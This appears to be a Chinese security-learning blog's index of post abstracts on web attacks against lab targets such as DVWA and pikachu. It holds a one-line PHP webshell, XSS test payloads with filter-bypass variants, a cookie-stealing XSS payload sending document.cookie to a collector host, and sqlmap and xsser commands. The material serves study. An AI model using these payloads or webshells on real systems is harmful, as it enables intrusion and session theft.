摘要： webshell 一句话木马 eval($_POST['muma']); system函数可以执行操作系统的命令 代码短，只有一行代码。 场景多，可以单独生成文件，也可以插入到图片中。 安全性高，隐藏性强，可变形免杀 小马 体积小，功能少，只有文件上传功能，为大马做铺垫。 大马 体积大，功能全，能够 阅读全文

摘要： csrf漏洞出现的原因： 网站接口被第三方网站调用时cookie被直接利用了 如何确定一个网站是否具有csrf漏洞 第三方网站调用敏感接口成功，则具有漏洞。 如何操作 BP可以对某些接口进行cdrf漏洞检测 可以生成一个html文件->poc，在浏览器中访问就可以确定是否包含 CSRF Tester 阅读全文

摘要： 测试payload： <script>alert('XSS')</script> <scriipt>alert(document.cookie)</script> ><scriipt>alert(document.cookie)</script> ='><scriipt>alert(document 阅读全文

摘要： XSSER 利用xsser检测dvwa平台，因为dvwa需要登录后使用，所以必须加上cookie 检测：xsser -u "http://192.168.221.1//dvwa/vulnerabilities" -g "xss_r/?name=1" --cookie = "security=low; 阅读全文

摘要： pikachu get型xss 1、xss平台需要先修改配置文件 2、payload：<script>document.location='http://192.168.221.135(xss平台的ip地址)/pikachu/pkxss/xcookie/cookie.php?cookie='+doc 阅读全文

摘要： xss reflected low payload:<script>alert('xxx')</script> medium 防御措施：使用str_replace函数替换了所有的<script> 绕过： str_replace对大小写并不敏感，或者双写绕过 payload:<Script>alert 阅读全文

摘要： 1、get型提交 sqlmap.py -u +网址 sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 参数level level的等级越高，测试的等级越广，>=2时会检查cookie里的参数 >=3时检查user-agent和refereer --dbs 阅读全文

摘要： 1、下载插件 仅仅提供框架流程 可以将图片内容发送给任何第三方接口 https://github.com/f0ng/captcha-killer-modified 导入到bp中 插件的配置： 配置： POST /reg HTTP/1.1Host: 127.0.0.1:8888Authorizatio 阅读全文

摘要： 原因：3306端口已经被占用 https://blog.csdn.net/weixin_56879408/article/details/125569033 阅读全文

摘要： 验证码作用 分类 静态验证码 问答式验证码 行为验证码 间接式验证码 无感验证码 验证码的实现 下载源码文件 验证码自动识别 ocr optical character recognition 远程ocr识别 使用api接口 阅读全文